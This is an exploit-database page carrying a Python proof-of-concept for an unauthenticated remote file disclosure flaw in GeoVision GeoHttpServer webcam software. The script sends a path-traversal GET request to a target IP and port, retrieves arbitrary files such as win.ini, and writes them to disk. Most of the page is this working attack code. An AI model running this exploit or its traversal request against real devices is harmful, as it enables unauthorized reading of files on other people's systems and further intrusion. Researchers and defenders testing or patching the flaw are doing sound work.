GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit



EKU-ID: 4903 CVE: OSVDB-ID:
Author: Viktor Minin Published: 2015-06-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
import os
import sys
import socket
import binascii
 
'''
Title       : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID      : none
Product     : GeoVision
System      : GeoHttpServer
Affected    : 8.3.3.0 (may be more)
Impact      : Critical
Remote      : Yes
Website link: http://www.geovision.com.tw/
Reported    : 10/06/2015
Author      : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability.
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
'''
 
#os.system("cls")
os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
os.system('color 2');
 
socket.setdefaulttimeout = 0.50
os.environ['no_proxy'] = '127.0.0.1,localhost'
CRLF = "\r\n"
 
 
def main():
    print "#######################################################################"
    print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
    print "# Usage: <ip> <port> <file>"
    print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini"
    print "#######################################################################"
    exit()
 
try:
    url     = sys.argv[1]
    port    = int(sys.argv[2])
    #files  = open(sys.argv[3],'r').read().split()
    file    = sys.argv[3]
except:
    main()
    
def recvall(sock):
    data = ""
    part = None
    while part != "":
        part = sock.recv(4096)
        data += part
    return data
 
def request(url, port, pfile):
    PATH = str(pfile)  
    HOST = url
    PORT = port
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.connect((HOST, PORT))
    sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
    data = recvall(sock)
    temp = data.split("\r\n\r\n")
    sock.shutdown(1)   
    sock.close()
    return temp[1]
 
ret = request(url, port, file)
hex = "".join("{:02x}".format(ord(c)) for c in ret)
bin = binascii.unhexlify(hex)
print ret
file = open(file.replace('\\', '_'),"wb")
file.write(bin)
file.close()
 
#~EOF